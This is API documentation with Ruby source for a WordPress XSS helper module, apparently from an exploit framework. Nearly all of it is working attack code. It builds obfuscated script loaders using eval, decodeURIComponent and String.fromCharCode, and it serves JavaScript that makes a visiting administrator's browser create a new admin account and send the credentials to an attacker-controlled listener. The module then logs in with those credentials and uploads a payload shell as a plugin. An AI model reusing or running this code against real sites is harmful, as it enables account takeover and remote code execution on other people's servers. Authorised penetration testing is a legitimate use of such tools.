module Wpxf::WordPress::Xss

Provides helper methods for generating scripts for XSS attacks.

Public Class Methods

new()

Initialize a new instance of {Xss}.

Calls superclass method Wpxf::Net::HttpServer::new
# File lib/wpxf/wordpress/xss.rb, line 13
# Initialize a new instance of {Xss}: marks the shell upload as not yet
# successful, records the module description and registers the `xss_host`
# and `xss_path` options.
#
# The `xss_path` default is generated once, here, so each instance carries
# its own random path segment.
def initialize
  super
  @success = false

  description = %(
      This module stores a script which will be executed when
      an admin user visits the vulnerable page. Execution of the script
      will create a new admin user which will be used to upload
      and execute the selected payload in the context of the
      web server.
    )
  _update_info_without_validation(desc: description)

  host_option = StringOption.new(
    name: 'xss_host',
    desc: 'The address of the host listening for a connection',
    required: true
  )
  path_option = StringOption.new(
    name: 'xss_path',
    desc: 'The path to access via the cross-site request',
    default: Utility::Text.rand_alpha(8),
    required: true
  )
  register_options([host_option, path_option])
end

Public Instance Methods

on_http_request(path, params, headers)

Default HTTP request handler for XSS modules, which serves the script required to create new administrator users and upload a payload shell.
@param path [String] the path requested.
@param params [Hash] the query string parameters.
@param headers [Hash] the HTTP headers.
@return [String] the response body to send to the client.

# File lib/wpxf/wordpress/xss.rb, line 106
# Default HTTP request handler for XSS modules.
#
# A request carrying both `u` and `p` query parameters is treated as the
# credential callback: the pair is reported and stored, the listener is
# stopped and the plugin upload is attempted with those credentials. Any
# other request is answered with the user-creation JavaScript.
#
# @param path [String] the path requested (not inspected here).
# @param params [Hash] the query string parameters.
# @param headers [Hash] the HTTP headers (not inspected here).
# @return [String] the response body to send to the client; empty once
#   credentials have been received.
def on_http_request(path, params, headers)
  username = params['u']
  password = params['p']

  unless username && password
    emit_info 'Incoming request received, serving JavaScript...'
    return wordpress_js_create_user
  end

  emit_success "Created a new administrator user, #{username}:#{password}"
  store_credentials username, password
  stop_http_server

  # #run reads this flag afterwards to decide whether the module succeeded.
  @success = upload_shell(username, password)

  ''
end
upload_shell(username, password)

Upload the selected payload as a WordPress plugin.
@param username [String] the username to authenticate with.
@param password [String] the password to authenticate with.
@return [Boolean] true if successful.

# File lib/wpxf/wordpress/xss.rb, line 126
# Upload the selected payload as a WordPress plugin using the supplied
# credentials.
#
# @param username [String] the username to authenticate with.
# @param password [String] the password to authenticate with.
# @return [Boolean] true when a session cookie was obtained and the upload
#   helper returned a non-nil response; false when authentication failed.
def upload_shell(username, password)
  session_cookie = authenticate_with_wordpress(username, password)
  return false unless session_cookie

  # Plugin and payload names are 10 random alphabetic characters each.
  plugin_slug, payload_file = Array.new(2) { Utility::Text.rand_alpha(10) }

  emit_info 'Uploading payload...'
  response = upload_payload_as_plugin_and_execute(plugin_slug, payload_file, session_cookie)

  # Only presence of a response is checked; its contents are not inspected here.
  !response.nil?
end
wordpress_js_create_user()

@return [String] a script that will create a new admin user and post the credentials back to {#xss_url}.
# File lib/wpxf/wordpress/xss.rb, line 82
# Build the JavaScript served to a visiting administrator's browser: the
# shared AJAX download/post helpers followed by the `create_wp_user.js`
# data file with its `$`-prefixed placeholders filled in.
#
# The username, password and e-mail address are freshly generated on every
# call, in the order listed below, so the values drawn from
# {Utility::Text} differ between requests.
#
# @return [String] a script that will create a new admin user and post the
#   credentials back to {#xss_url}.
def wordpress_js_create_user
  new_user_url = wordpress_url_new_user
  username = Utility::Text.rand_alpha(6)
  password = "#{Utility::Text.rand_alphanumeric(10)}!"
  email = "#{Utility::Text.rand_alpha(7)}@#{Utility::Text.rand_alpha(10)}.com"
  callback_url = xss_url

  placeholders = {
    '$wordpress_url_new_user' => new_user_url,
    '$username' => username,
    '$password' => password,
    '$email' => email,
    '$xss_url' => callback_url
  }

  user_script = Wpxf::DataFile.new('js', 'create_wp_user.js')

  %(
    #{js_ajax_download}
    #{js_ajax_post}
    #{user_script.content_with_named_vars(placeholders)}
  )
end
xss_ascii_encoded_include_script()

@return [String] a script that includes the user creation JavaScript without any spaces or quotation marks that might be escaped by the likes of magic-quotes.
# File lib/wpxf/wordpress/xss.rb, line 71
# @return [String] {#xss_include_script} expressed as a comma-separated list
#   of byte values wrapped in `eval(String.fromCharCode(...))`, so the
#   result contains neither spaces nor quotation marks.
def xss_ascii_encoded_include_script
  char_codes = xss_include_script.bytes.map(&:to_s).join(',')
  "eval(String.fromCharCode(#{char_codes}))"
end
xss_host()

@return [String] the address of the host listening for a connection.

# File lib/wpxf/wordpress/xss.rb, line 43
# @return [String] the address of the host listening for a connection, read
#   from the `xss_host` option.
def xss_host
  option_name = 'xss_host'
  normalized_option_value(option_name)
end
xss_include_script()

@return [String] a script that includes the user creation JavaScript.

# File lib/wpxf/wordpress/xss.rb, line 58
# Build a short loader that appends a `<script>` element pointing at
# {#xss_url} to `document.head`. The loader is URL-encoded and embedded
# as the source text of a regex literal, which is then decoded and
# evaluated by the browser.
#
# @return [String] a script that includes the user creation JavaScript.
def xss_include_script
  loader = String.new
  loader << 'var a = document.createElement("script");'
  loader << "a.setAttribute(\"src\", \"#{xss_url}\");"
  loader << 'document.head.appendChild(a);'

  "eval(decodeURIComponent(/#{url_encode(loader)}/.source))"
end
xss_path()

@return [String] the path to make cross-site requests to.

# File lib/wpxf/wordpress/xss.rb, line 48
# @return [String] the path to make cross-site requests to, read from the
#   `xss_path` option.
def xss_path
  option_name = 'xss_path'
  normalized_option_value(option_name)
end
xss_shell_success()

@return [Boolean] true if the XSS shell upload was successful.

# File lib/wpxf/wordpress/xss.rb, line 140
# @return [Boolean] true if the XSS shell upload was successful; the value
#   is whatever {#on_http_request} last stored in `@success`.
def xss_shell_success
  instance_variable_get(:@success)
end
xss_url()

@return [String] the full URL to make cross-site requests to.

# File lib/wpxf/wordpress/xss.rb, line 53
# @return [String] the full URL to make cross-site requests to, assembled
#   from {#xss_host}, the HTTP server's bind port and {#xss_path}. The
#   scheme is always plain `http`.
def xss_url
  host = xss_host
  port = http_server_bind_port
  path = xss_path
  format('http://%s:%s/%s', host, port, path)
end
xss_url_and_ascii_encoded_include_script()

@return [String] the URL encoded value of xss_ascii_encoded_include_script.

# File lib/wpxf/wordpress/xss.rb, line 76
# @return [String] the URL encoded value of
#   {#xss_ascii_encoded_include_script}.
def xss_url_and_ascii_encoded_include_script
  encoded_script = xss_ascii_encoded_include_script
  url_encode(encoded_script)
end